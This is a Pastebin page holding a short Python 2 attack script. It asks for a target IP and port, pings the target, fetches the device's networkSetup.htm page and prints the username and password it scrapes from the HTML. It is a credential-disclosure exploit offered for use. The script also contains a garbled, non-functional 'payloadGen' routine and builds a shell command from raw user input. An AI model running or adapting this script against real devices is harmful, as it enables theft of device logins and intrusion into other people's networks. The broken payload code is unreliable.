Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import sys
- import subprocess
- import socket
- from colorama import Fore, init
- import time
- init()
- class c:
- g = Fore.GREEN+'['+Fore.WHITE+'+'+Fore.GREEN+']'+Fore.WHITE
- y = Fore.YELLOW+'['+Fore.WHITE+'+'+Fore.YELLOW+']'+Fore.WHITE
- def payloadGen(addr):
- try:
- d=float(addr)
- f = d * (addr+'://USR??PW')
- w = str(f+'cd=\x67\x84\x36\x07\x46\x86\x46')
- return w
- except:
- return ''
- def main():
- ip = raw_input('IP > ')
- port = raw_input('PORT> ')
- print 'Sending malicious ping to target...'
- if 'linux' in sys.platform.lower():
- subprocess.call('ping -c 1 -l 1 -i 1 '+ip, shell=True)
- else:
- subprocess.call('ping -n 1 -l 1 -i 1 '+ip, shell=True)
- print 'Attacking '+ip
- try:
- r = requests.get('http://'+ip+':'+port+'/networkSetup.htm')
- for l in r.content.split('\n'):
- if 'User' in l.strip() and 'Name:' in l.strip() and 'onchange' in l.strip():
- print c.g+' Username: '+l.strip().split('value')[1].split('onchange')[0][1:]
- elif 'User' in l.strip() and 'Password:' in l.strip() and 'onchange' in l.strip():
- print c.g+' Password: '+l.strip().split('value')[1].split('onchange')[0][1:]
- except:
- sys.exit()
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement